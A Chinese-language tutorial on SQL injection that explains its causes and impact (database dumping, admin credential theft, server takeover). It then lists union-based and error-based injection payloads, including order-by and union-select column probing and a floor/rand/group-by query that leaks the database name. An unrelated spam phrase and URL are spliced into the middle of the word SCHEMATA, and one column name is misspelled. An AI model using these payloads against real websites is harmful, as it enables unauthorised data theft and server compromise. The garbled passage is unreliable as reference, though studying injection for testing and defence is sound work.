sql注入总结

sql注入

先看几个已经发生的sql注入

 

漏洞原理

　　web应用程序对用户输入数据的合法性没有判断或者过滤不严格，攻击者在程序事先定义好的sql语句结尾添加额外的sql语句，欺骗sql服务器执行非授权的任意查询，得到一些数据。

漏洞危害

　　1. 脱库，通过批量查询的方式获取数据库中有用的信息。

　　2. 查询管理员的账号、密码，从而利用管理员账号密码做更多的操作。

　　3. 对数据增删改查，达到非法的目的。

　　4. 如果有读写权限，也可以直接向服务器写木马文件，读取服务器中敏感文件，进一步进行提权，从而控制整个服务器。

漏洞利用　　1. union联合查询

　　union用于合并两个或者多个select语句的结果集。通过将原有查询语句结果置为空，页面上就会回显union后的select语句的结果。

联合查询中需要得到原有查询语句的列数，最常用的两种方式

1. 使用order by 
?id=1' order by 3 --+ 
2. 使用union语句判断列数
?id=1' union select NULL,NULL,NULL --+
在Oracle中，每个查询语句都必须使用FROM关键字并指定一个有效的表，有一个DUAL表
?id=1' union select NULL,NULL from DUAL --

 　　使用union查询可利用的sql函数有：

mysql中
@@version   #查询数据库版本
database()  #查当前数据库
user()      #用户
有3个常用的连接字符串函数：
concat(1,2)      #将两个字符串连接在一起
concat_ws(#,1,2)   #不同的字符串用#隔开
group_concat(1,2,3)  #显示在同一行

　　数据库中的默认库或者表

　　mysql中有一个information_schema库，该库中有3张默认表：分别为：

　　SCHEMA 西藏干部培训 http://xz.ganxun.cn/ TA、TABLES、COLUMNS

　　对应的字段名有：SCHEAMTA_NAME；TABLE_SCHEMATA，TABLE_NAME；TABLE_SCHEMATA，TABLE_NAME，COLUMN_NAME；

　　2. 报错注入

　　当页面没有回显信息，但是存在sql的报错语句时，我们就可以尝试使用报错注入，通过一些函数的使用，导致数据库执行出错，返回我们构造的查询语句的结果。

　　常见的报错注入函数：

　　floor():

floor：这个函数需要结合count(),rand(),group by()一起 来利用。

　?name=luy' or (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))) --+